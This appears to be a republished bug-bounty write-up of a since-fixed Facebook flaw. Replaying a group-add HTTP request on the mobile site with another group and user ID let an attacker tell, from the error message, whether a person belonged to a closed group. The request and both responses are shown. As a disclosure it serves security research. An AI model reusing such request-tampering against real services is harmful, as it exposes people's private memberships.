Facebook Vulnerability: Expose Group Member — $3000

3 years ago 167
BOOK THIS SPACE FOR AD
ARTICLE AD

Muhammad S

The issue is Insecure Direct Object with impact malicious user can expose or determine member on closed group. But the issue have limits, if member (on closed group) and attacker is friend. That is reason why the bounty is $3000. If there is no limit, the attacker and victim have no friendship, then the reward is $5000.

A person’s membership in a closed group is confidential. We only know who is the admin. But a person’s status can be identified by modifying the http request via mtouch.facebook.com. The attacker initially stores a request for joining a group he manages, then replaces it with the target group. In this way a person’s membership status will still be known by the appearance of an error “Already a member”.

POST /a/group/?gid=GROUP_ID&aid=USER_ID&refid=18 HTTP/1.1

Host: mtouch.facebook.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: */*

…..

confirm=Approve&m_sess=&fb_dtsg=

…..

Change “gid=” with victim’s group_id“aid=” is user_id who will be checked for membership statusIf person not as member, the response will display

for (;;);{“__ar”:1,”error:1376045,”errorSummary”:”Cannot add member”,”errorDescription”:”You need to be an admin or a moderator of the group, or a friend of this person, to add them as a member.”,”payload”:null,”bootloadable”:{},”ixData”:{},”bxData”:{},”gkxData”:{},”qexData”:{},”lid”:”"}

But if person is member from group the response

for (;;);{“__ar”:1,”error”:1376015,”errorSummary”:”Already a Member”,”errorDescription”:”The person you’ve just tried to add is already a member of this group.”,”payload”:null,”bootloadable”:{},”ixData”:{},”bxData”:{},”gkxData”:{},”qexData”:{},”lid”:”"}

26 May 2019 : Report

30 May 2019: Request for more information

13 June 2019: They fix my report

2 October 2019: Bounty

Read Entire Article